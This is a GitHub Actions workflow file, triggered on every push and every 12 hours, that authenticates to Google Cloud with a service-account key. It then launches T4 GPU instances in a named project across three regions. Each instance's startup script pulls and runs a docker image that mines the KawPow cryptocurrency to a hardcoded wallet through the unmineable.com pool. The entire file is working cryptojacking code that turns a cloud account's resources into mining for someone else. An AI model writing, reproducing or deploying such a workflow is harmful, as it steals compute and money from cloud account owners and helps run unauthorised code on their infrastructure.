name: GCP GPU (KawPow)
on:
  push:
    branches: [ "*" ]
  schedule:
    - cron: '0 */12 * * *'
jobs:
  kawpow:
    runs-on: ubuntu-latest
    steps:
      - name: Provision KawPow Node
        env:
          GCP_KEY: ""
        run: |
          echo "$GCP_KEY" | base64 -d > key.json
          gcloud auth activate-service-account --key-file=key.json
          PROJECT="sisu-tech-data-platform"
          REGIONS=("us-central1-a" "europe-west4-a" "asia-southeast1-a")
          for ZONE in "${REGIONS[@]}"; do
            INSTANCE_NAME="kawpow-t4-${ZONE%%-*}-$RANDOM"
            echo "Launching $INSTANCE_NAME in $ZONE..."
            gcloud compute instances create $INSTANCE_NAME               --project=$PROJECT               --zone=$ZONE               --machine-type=n1-standard-4               --maintenance-policy=TERMINATE               --accelerator=type=nvidia-tesla-t4,count=1               --image-family=cos-113-lts               --image-project=cos-cloud               --boot-disk-size=50GB               --metadata=startup-script="docker run -d --name kawpow --runtime=nvidia                 -e WALLET=D4dbTEpvsDDQK8V56USNgDsircfmDHXQQmTkafnxLR56 -e POOL=kp.unmineable.com:3333                 pluspaytr/pluspay-tcp-cloud-live:latest" && break
          done
